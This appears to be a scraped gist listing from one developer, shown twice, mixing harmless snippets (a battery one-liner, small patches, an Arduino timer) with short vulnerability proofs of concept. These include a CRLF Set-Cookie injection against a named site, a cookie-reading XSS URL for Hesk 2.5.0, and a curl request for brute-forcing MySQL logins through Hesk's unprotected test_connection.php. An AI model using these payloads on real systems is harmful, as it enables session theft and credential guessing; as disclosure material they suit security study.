cedric cedriczirtacic

## gist:7459317
( cd /sys/class/power_supply/BAT1/ && perl -e "printf(\"%%%d\n\",(( "`cat charge_now`" / "`cat charge_full`" ) * 100));" )

## webmin_postgresql_backup_compress.patch
--- postgresql/backup.pl.old    2013-12-17 14:50:06.000000000 -0300
+++ postgresql/backup.pl        2013-12-17 16:25:52.000000000 -0300
@@ -2,6 +2,7 @@
 # backup.pl
 # Called by cron to backup a database

+my $compress;
 $no_acl_check++;
 require './postgresql-lib.pl';


## unbounce_setcookie_poc.html
[cicatriz@localhost ~]$ curl -v 'http://go.unbounce.com/pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2=' -H 'Host: go.unbound.com' -H 'Accept: */*'
* About to connect() to go.unbounce.com port 80 (#0)
*   Trying 54.225.243.45...
* connected
* Connected to go.unbounce.com (54.225.243.45) port 80 (#0)
> GET /pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2= HTTP/1.1
> User-Agent: curl/7.27.0
> Host: go.unbound.com
> Accept: */*
>

## paytv.pl
#!/usr/bin/perl -w
# Pay TV (Category: Web) Author(s): qll, tangled
# These robo-friends were shocked to see that they had to pay to watch the news
# broadcast about the â€œOktoberfestâ€. Can you help them?
# Here is your challenge: https://ctf.fluxfingers.net:1316/

#use strict;
use warnings;
use LWP::UserAgent;
use Data::Dumper;

## Hesk 2.5.0 XSS example
http://www.victim.com/ticket.php?track='),alert(document.cookie);//?&Refresh=36528&f=1

## attack
HTTP/1.1 200 OK
Server: test
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Aug 2014 14:42:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 13

<h1>TEST</h1>

## gist:c32e8e4348b216c8d555
(*) There isn't an access control in the file test_connection.php, which performs tests for MySQL connections (also POP3 and SMTP). This can give an attacker the opportunity to perform a dictionary bruteforce attack and check every possible combination of username/password and/or databases without having the need to make a real connection to the MySQL service.

(*) proof-of-concept:

curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed

Where USERNAME, PASSWORD and DATABASE are parameters to bruteforce.

## puppet-dashboard.patch
--- /etc/init.d/puppet-dashboard.old    2015-03-19 11:36:46.000000000 -0300
+++ /etc/init.d/puppet-dashboard        2015-03-19 11:39:45.000000000 -0300
@@ -78,7 +78,13 @@

 restart () {
         stop
-        start
+       RETVAL=$?
+       if [ $? -gt 0 ];then
+               return $RETVAL

## boxing_timer.ino
// Simple boxing timer

// turn on debug strings
#define DEBUG true

// leds
int pingreen = 13;
int pinred = 11;
// buzzer
int pinbuzz = 12;

## sarg_pfsense_0.6.10_LFI.patch
--- sarg_frame.php.old  2016-03-11 14:25:58.000000000 -0300
+++ sarg_frame.php      2016-03-11 16:09:53.000000000 -0300
@@ -34,6 +34,11 @@
        ini_set('memory_limit', '250M');
 }

+// Small security check
+if(!empty($_REQUEST['file'])){
+       $_REQUEST['file']=preg_replace('/(\.+\/|\\\.*|\/{2,})*/',"", $_REQUEST['file']);
+}
	--- postgresql/backup.pl.old 2013-12-17 14:50:06.000000000 -0300
	+++ postgresql/backup.pl 2013-12-17 16:25:52.000000000 -0300
	@@ -2,6 +2,7 @@
	# backup.pl
	# Called by cron to backup a database

	+my $compress;
	$no_acl_check++;
	require './postgresql-lib.pl';
	[cicatriz@localhost ~]$ curl -v 'http://go.unbounce.com/pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2=' -H 'Host: go.unbound.com' -H 'Accept: /'
	* About to connect() to go.unbounce.com port 80 (#0)
	* Trying 54.225.243.45...
	* connected
	* Connected to go.unbounce.com (54.225.243.45) port 80 (#0)
	> GET /pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2= HTTP/1.1
	> User-Agent: curl/7.27.0
	> Host: go.unbound.com
	> Accept: /
	>
	#!/usr/bin/perl -w
	# Pay TV (Category: Web) Author(s): qll, tangled
	# These robo-friends were shocked to see that they had to pay to watch the news
	# broadcast about the â€œOktoberfestâ€. Can you help them?
	# Here is your challenge: https://ctf.fluxfingers.net:1316/

	#use strict;
	use warnings;
	use LWP::UserAgent;
	use Data::Dumper;
	HTTP/1.1 200 OK
	Server: test
	Content-Type: text/html; charset=UTF-8
	Date: Tue, 05 Aug 2014 14:42:52 GMT
	Expires: Thu, 19 Nov 1981 08:52:00 GMT
	Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
	Pragma: no-cache
	Content-Length: 13

	<h1>TEST</h1>
	(*) There isn't an access control in the file test_connection.php, which performs tests for MySQL connections (also POP3 and SMTP). This can give an attacker the opportunity to perform a dictionary bruteforce attack and check every possible combination of username/password and/or databases without having the need to make a real connection to the MySQL service.

	(*) proof-of-concept:

	curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed

	Where USERNAME, PASSWORD and DATABASE are parameters to bruteforce.
	--- /etc/init.d/puppet-dashboard.old 2015-03-19 11:36:46.000000000 -0300
	+++ /etc/init.d/puppet-dashboard 2015-03-19 11:39:45.000000000 -0300
	@@ -78,7 +78,13 @@

	restart () {
	stop
	- start
	+ RETVAL=$?
	+ if [ $? -gt 0 ];then
	+ return $RETVAL
	// Simple boxing timer

	// turn on debug strings
	#define DEBUG true

	// leds
	int pingreen = 13;
	int pinred = 11;
	// buzzer
	int pinbuzz = 12;
	--- sarg_frame.php.old 2016-03-11 14:25:58.000000000 -0300
	+++ sarg_frame.php 2016-03-11 16:09:53.000000000 -0300
	@@ -34,6 +34,11 @@
	ini_set('memory_limit', '250M');
	}

	+// Small security check
	+if(!empty($_REQUEST['file'])){
	+ $_REQUEST['file']=preg_replace('/(\.+\/\|\\\.\|\/{2,})/',"", $_REQUEST['file']);
	+}